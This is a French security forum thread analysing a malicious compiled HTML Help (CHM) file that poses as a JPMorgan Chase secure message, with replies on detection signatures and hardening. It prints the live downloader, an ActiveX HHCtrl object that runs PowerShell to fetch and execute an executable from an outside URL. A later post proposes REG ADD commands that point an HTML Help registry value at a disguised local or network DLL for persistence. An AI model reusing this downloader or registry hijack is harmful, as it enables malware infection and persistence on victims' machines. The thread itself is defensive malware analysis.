CHM malveillants: HTML compilés + ActiveX + PowerShell

[ѠOOT]

Bonjour,

Dans la continuité des sujets précédents ( Documents XLS malveillants : macros-commandes VBA+PowerShell & XLS/DOC malveillants : analyser les flux de documents OLE ). Aujourd'hui, j'ai sélectionné cet échantillon détecté génériquement par l'antivirus Avast! comme étant HTML:Runner-S. Il s'agit d'un fichier d'aide HTML compilé nommé "SecureMessage.chm". ( .CHM : compressed HTML )

Pour extraire les ressources du fichier CHM, j'utilise l'argument "decompile" de l'interface d'aide, l'utilitaire Microsoft® HTML Help Executable situé à l'emplacement "%WINDIR%\hh.exe".

hh -decompile c: SecureMessage.chm

Un fichier HTML nommé "SecureMessage.htm" apparait dans le lecteur C:
L'utilitaire htm2chm v3.0.9.3 a été utilisé pour générer le CHM à partir du fichier HTML initial.

La page qui s'intitule "Secure Message" tente de convaincre la future victime qu'il s'agit d'un courriel sécurisé émanant de "JPMorgan Chase". "This is a secure, encrypted message." & "This message is currently encrypted , please do not close any windows during decrypting." Que se passe t'il réellement pendant ce laps de temps ?

En affichant la source,
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1"
value=",cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile('http://selkirkconed.com/wp-content/uplo ... masla2.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla2.exe')">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<script>
x.Click();
</SCRIPT>

Le JavaScript effectuera l'action "Click" sur l'objet "x". L'objet "x", d'une taille de 1 pixel sera quasi-invisible. Son CLSID "adb880a6-d8ff-11cf-9377-00aa003b7a11" indique le GUID de la classe d'un objet OLE qui n'est autre que "HHCtrl Object" c'est à dire "Microsoft® HTML Help Control" situé à l'emplacement "%WINDIR%\System32\hhctrl.ocx" (OCX signifie OLE Control eXtension). Cette pratique permet, via les paramètres, de piloter l'interface d'aide dans le but d'exécuter du code arbitraire. L'interpréteur de commandes "cmd.exe" va exécuter la commande "PowerShell" avec des arguments. La commandelette "New-Object" de Windows PowerShell est utilisée pour créer et utiliser la méthode WebClient.DownloadFile pour récupérer un exécutable situé à l'URL mentionnée qui sera ensuite exécuté → GAME OVER

Le 28 avril 2015 à 15:30:52 (CET) ce programme malveillant téléchargé était détecté à 0% au moment de l'analyse sur Jotti. À 16:01:10 UTC, seuls 3 / 54 moteur antivirus sur VirusTotal.

Avec l'apparence d'un faux message sécurisé & chiffré de JPMorgan Chase, l'utilisateur se dira qu'il s'agissait probablement d'une erreur ou d'une sorte de tentative d'hameçonnage ratée. Mais détrompez-vous, il n'en est rien. Les codes JavaScript couplés aux usages d'ActiveX dans le contexte des traitements de fichiers d'aides HTML compilés sont loin d'être une nouveauté ; l'introduction de PowerShell contraste par son absence de cohérence avec le reste d'un genre plutôt old-school.. mais malheureusement pour les victimes, ça fonctionne.

edit: Ajouts de liens connexes:
➱ ( 7 May 2015 ) ❴ Microsoft Help File Malware Targets JPMorgan Chase Customers ❵
➱ ( 29 June 2015 ) ❴ MERS News Used in Targeted Attack against Japanese Media Company - ZXShell ❵

[lab34]

Bonjour,
merci, c'est très intéressant.

Est ce que l'UAC n'alerte pas quand l'exe est lancé par le powershell ?

[ѠOOT]

Bonjour,

Bonne question. Je n'ai pas eu le temps libre nécessaire pour évaluer davantage la situation mais si l'occasion se présente je testerai. Si tu prends l'initiative de tester, merci de nous informer des résultats obtenus. Les habituels killbits sont inopérants dans ce contexte. Et un simple utilisateur a malheureusement la possibilité d'ouvrir ce type de documents piégés. On l'a déjà observé sur les documents piégés Word & Excel, un attaquant pourrait très bien sophistiquer légèrement et scénariser le tout avec une pointe d'ingénierie sociale dans le but d'abaisser le niveau de sécurité et/ou la vigilance de l'utilisateur. Donc UAC ou non (Invoke-BypassUAC) un doute pourra s'installer. De ce fait, il est plutôt conseillé de miser sur la mise en œuvre de mesures sécuritaires en amont d'une possible "catastrophe" et éventuellement détecter en temps réel la présence de celle-ci, le cas échéant. Pour y parvenir, un simple système de prévention d'intrusion type IDS/IPS tels que Snort, Suricata, ETPro Ruleset,.. pour un particulier qui possède une ou deux stations de travail c'est un peu excessif mais pas pour un réseau de machines en entreprise. Les mises à jour des signatures sont alimentées régulièrement grâce à une communauté active et éventuellement il est toujours possible de générer vos propres règles dans l'urgence afin de prévenir et/ou contenir une menace. D'ailleurs la mise à jour du 27 avril 2015, date à laquelle j'ai constaté une montée en volume du programme malveillant téléchargé ( Stoberox / Zlader / Mazahaka / .. ces nominations dépendent de l'éditeur de l'antivirus ) par ces CHM piégés. On constate aussi des améliorations de signatures concernant les dernières évolutions de la famille Dridex.

2021013 - ET TROJAN Likely Dridex Generic SSL Cert (trojan.rules)
2810814 - ETPRO TROJAN Win32/Zlader.H Checkin (trojan.rules)

À noter que les Dridex & ( Stoberox | Zlader | Mazahaka ) ne sont pas à prendre à la légère, ces programmes malveillants sont spécialisés dans les vols d'identifiants et de données bancaires.

edit: Ajouts de liens connexes.
➱ ( March 4, 2015 ) ❴ Dridex Attacks Target Corporate Accounting ❵
➱ ( April 6, 2015 ) ❴ Spam Served With a Side of Dridex ❵

[lab34]

Bonjour, merci,
effectivement, dés hier 11h, virustotal détectait à 27/56

Quand j'ai vu cela, ça m'a fait penser qu'il ne faut pas trop réduire la fréquence de mise à jour des signatures sur les antivirus. Il faut que je vérifie, mais je crois que j'avais réduit à une par jour sur un PC qui est très utilisé pour le jeu en ligne (les maj provoquent des lags ! ;-) )

Et bien sûr, prévention, ne pas cliquer sur n'importe quoi...

[ѠOOT]

Bonjour,

En regardant plus près, j'ai observé qu'une restriction d'HH s'avère particulièrement intéressante.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\HTMLHelp\1.x\HHRestrictions]
"SafeModeDetectionSetting"=dword:00000001

SafeModeDetectionSetting va limiter les risques face aux dangers précités.
Je n'ai pas trouvé de référence officielle à cette option mais ça dépanne.

Pendant que j'avais le nez dedans j'ai constaté diverses choses assez originales.
À chaque instance d'HH, il y a un appel systématique à l'emplacement "Location".
Comme c'est en HKCU, même un compte utilisateur limité a les droits d'écritures.

REG ADD "HKCU\Software\Microsoft\HTMLHelp Author" /v Location /t REG_SZ /d "%tmp%\crochetage.dll"

Ici l'emplacement est local mais rien n'empêche de spécifier un emplacement distant de type UNC donc sur un chemin réseau vers une librairie déguisée, par exemple en "compta.xls". Ça pourrait picoter avec des relations particulières de confiance pré-établies depuis des lustres entre les machines ; c'est souvent le cas :\

REG ADD "HKCU\Software\Microsoft\HTMLHelp Author" /v Location /t REG_SZ /d "\\SERVEUR\Public\compta.xls"

Certes ça mérite quelques ajustements mais on a vu des attaques réussies pour moins que ça.
À mes yeux je considère cet emplacement comme un point de chargement persistant potentiel.